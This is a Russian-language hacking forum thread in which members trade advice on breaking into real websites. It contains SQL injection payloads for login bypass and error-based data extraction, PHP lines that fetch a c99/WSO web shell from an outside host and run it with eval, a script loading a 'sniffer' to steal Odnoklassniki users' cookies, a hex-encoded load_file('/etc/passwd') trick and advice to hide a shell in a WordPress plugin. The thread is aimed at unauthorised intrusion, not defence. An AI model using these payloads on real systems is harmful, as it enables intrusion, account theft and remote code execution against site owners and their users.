Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Есть идеи как провести иньекцию если фильтрует все символы кроме \
    Executing: select * from user where username='admin\' and password='1'<br>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<script>alert("invalid password");history.back(-1)

    Если вставить куда нибудь сторонние символы напишет nothing to do here)

    Есть варианты?
     
  2. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Ну смотри, ты ввёл логин admin\ и пароль 1. Получается:
    select * from user where username='admin\' and password='1'

    Выделенное зелёным интерпретируется как строка. Варианты например:

    зайти без пароля
    select * from user where username='admin\' and password=' or 1=1 -- '

    Error-based эксплуатация:
    select * from user where username='admin\' and password=' or 1=((select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2))))-- '


    Про "сторонние символы" не понял.
     
  3. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    с инклудом никогда не сталкивался,а с шеллом тем более,на другом сайте у меня есть шелл
    пробывал я так <?php echo file_get_contents("http://site.ru/c99.txt"); ?> но он не запускается,а просто грузится на страницу и всё если http://site.ru/c99.php то сайт вообщевиснет
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    там нет инклуда, то обычное выполнения пхп кода, понятное дело что он не запускается, с какого перепугу ему запустится без eval как в моём примере??
     
  5. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    можно поподробнее на будущее вот этот код $a = file_get_contents("http://site.ru/wso.txt"); eval($a); где писать?
     
    #22685 noviks, 26 Oct 2013
    Last edited: 26 Oct 2013
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    вместо того кода что ты шифровал в басе64
     
  7. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    ни xрена Ошибка выполнения программы Может с99 не катит
     
    #22687 noviks, 26 Oct 2013
    Last edited: 26 Oct 2013
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    где ошибка? какой программы?
     
  9. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    сделал так
    <? eval(file_get_contents("http://site.ru/shell.txt"));?>
    всё нормально запускается,но когда пытаюсь перейти в каталог, чистая страница и Ошибка выполнения программы
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    так дирку ж уже прикрыли....
     
  11. djhovo09

    djhovo09 New Member

    Joined:
    2 Jul 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер

    <div id="ok_group_widget"></div>
    <script>
    !function (d, id, did, st) {
    var js = d.createElement("script");
    js.src = "http://snifer.ejan.ru/connect.js";
    js.onload = js.onreadystatechange = function () {
    if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
    if (!this.executed) {
    this.executed = true;
    setTimeout(function () {
    OK.CONNECT.insertGroupWidget(id,did,st);
    }, 0);
    }
    }}
    d.documentElement.appendChild(js);
    }(document,"ok_group_widget","52864984219766","{width:250,height:335}");


    </script>
     
  12. Win32BOT

    Win32BOT Member

    Joined:
    4 Mar 2013
    Messages:
    62
    Likes Received:
    10
    Reputations:
    -3
    Незнаю что за двиг.
    В поиске пишу <<
    Получаем http://www.site.com/ru/search/?searchString=<<

    и ошибку:
    В первый раз с этим сталкиваюсь. Можно ли что то выжать из этого?
    Заранее Thanx))
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    несилён в ворд прессе, короче нет прав на запись, где в админке можно влепить хтмл код чтобы он на всех страницах отобразился?
     
    #22693 qaz, 29 Oct 2013
    Last edited: 29 Oct 2013
  14. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    116
    Likes Received:
    29
    Reputations:
    26
    Через ред. шаблонов/тем. Но шаблоны хранятся в файловой системе, поэтому если нет прав на запись,то увы, нигде(если хочешь на всех).
     
    1 person likes this.
  15. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    в плагин шелл запакуй, если есть возможность загрузки на сайт
     
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Как Havij проводит load_file? через программку /etc/passwd выводит норм, а вручную вывести что то неполучается
     
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Не знаю, как Havij, но, если у тебя mg=on, то load_file('/etc/passwd'), сам понимаешь, не пройдет. Здесь выручает hex: load_file(0x2f6574632f706173737764)
     
    1 person likes this.
  18. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    При обоих вариантах получаю CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION db_name.loаd_file does not exist. до этого что то делал получал пустую страничку. В это же время Havij показывает и показывал все без проблем, вот и интересно, что он делает и как
     
  19. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Если выводится пустая страница, смотри source страницы, зачастую там выводится.
     
  20. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    При единичном параметре пишет Unknown column '1' in 'order clause' http://www.friendlytarget.com/index.php?game=16%27+order+by+1+--+ что делать
     
Thread Status:
Not open for further replies.